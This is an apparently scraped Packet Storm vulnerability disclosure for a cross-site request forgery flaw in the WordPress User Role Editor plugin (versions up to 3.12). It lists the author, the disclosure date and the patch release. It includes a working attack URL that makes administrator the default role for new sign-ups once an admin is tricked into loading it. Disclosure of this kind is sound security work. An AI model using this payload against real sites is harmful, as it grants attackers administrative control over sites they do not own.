WordPress User Role Editor plugin version 3.12 suffers from a cross site request forgery vulnerability.
f881320e4a6513457ac1d19645502215a0dc771eccc30dd7bd787ce5cc531b2e# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet
Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13
Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.
http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed